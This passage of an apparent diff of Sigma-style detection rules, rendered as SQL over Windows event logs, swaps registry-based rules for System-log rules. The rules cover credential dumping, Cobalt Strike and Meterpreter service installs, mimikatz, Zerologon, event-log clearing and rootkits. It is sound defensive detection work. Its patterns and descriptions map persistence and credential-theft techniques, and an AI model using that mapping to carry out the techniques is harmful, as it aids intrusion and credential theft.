installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_firewall_as_delete_all_rules.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", - "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Eventlog Cleared", + "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_system_eventlog_cleared.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "title": "Potential CVE-2021-42278 Exploitation Attempt", + "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_exploit_cve_2021_42278.yml" }, { - "title": "Run Once Task Configuration in Registry", - "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "title": "Potential CVE-2021-42287 Exploitation Attempt", + "id": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", "status": "test", - "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate modification of the registry key by legitimate program" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((NewValue LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((NewValue LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))" ], - "filename": "registry_event_runonce_persistence.yml" + "filename": "win_system_exploit_cve_2021_42287.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" - ], - "falsepositives": [ - "Unknown" + "attack.t1210", + "attack.lateral_movement" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "New DLL Added to AppInit_DLLs Registry Key", - "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.persistence", - "attack.t1546.010" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Atbroker Registry Change", - "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", "status": "experimental", - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" + "attack.privilege_escalation" ], "falsepositives": [ - "Creation of non-default, legitimate at usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_atbroker_change.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "PortProxy Registry Key", - "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_portproxy_registry_key.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Installation in Suspicious Folder", + "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "status": "experimental", + "description": "Detects service installation in suspicious folder appdata", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_susp_service_installation_folder.yml" }, { - "title": "New DLL Added to AppCertDlls Registry Key", - "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", - "status": "test", - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "author": "Ilyas Ochkov, oscd.community", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of 